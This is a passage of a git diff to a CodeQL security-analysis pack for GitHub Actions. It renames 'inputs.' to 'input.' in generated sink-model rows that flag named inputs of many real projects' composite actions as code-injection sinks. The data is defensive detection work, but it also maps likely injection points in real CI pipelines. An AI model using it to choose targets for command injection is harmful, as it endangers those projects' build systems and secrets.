of file + - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "input.cross_compiling", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index d0540414702..a5d99cfc5e0 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] - - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file + - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "input.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 9020a979bbb..e07d26e6a5f 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file + - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 91c84fda1d1..3fe7b27d9d5 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] - - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file + - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "input.dockerhub-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 5031ff1e4ca..664c28bfc55 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] - - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file + - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "input.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index fc3a7ebe253..7b90ed20234 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "input.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index b7a664d512f..62b31c2d3ef 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] - - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "input.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index e86f7432a48..427b75730ab 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] - - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 164ba02c42b..441913730fa 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] - - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file + - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "input.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 17fb61eeeb1..cbb2b43a2d8 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] - - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file + - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 8513c7da64d..2f981b5bd63 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] - - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file + - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "input.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index a4ab8f025d0..5d3d44e914c 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] - - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7d82b2d3e9e..7b41c1b2721 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index e466e17ddb4..505fbb22005 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] - - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 53881157a23..24223da3c89 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] - - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 5ee6e863db6..b529c0117f4 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] - - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 3f5a3b658c3..6a46669f05d 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] - - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index f5c13431126..ec2f45f31db 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -3,15 +3,15 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] - - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 4788f44e856..3574855be3c 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] - - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 7c66229c174..4ee1b878e54 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 9eb3bdcf5eb..8453a2d415c 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0db95acd5cd..dc86b795981 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] - - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 785384aa207..ca9cc034d10 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] - - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 24c4fb4bc70..b8aecfd5e3d 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 72575eb7368..e7ac083da83 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index b2b49fbba09..5cac21a0751 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] - - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 6755f0d773c..83e1345edf2 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] - - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 1b55ab2d549..8708afa3f3b 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 84401828721..e4f1637603e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 35804a87f05..f8b636c4636 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", 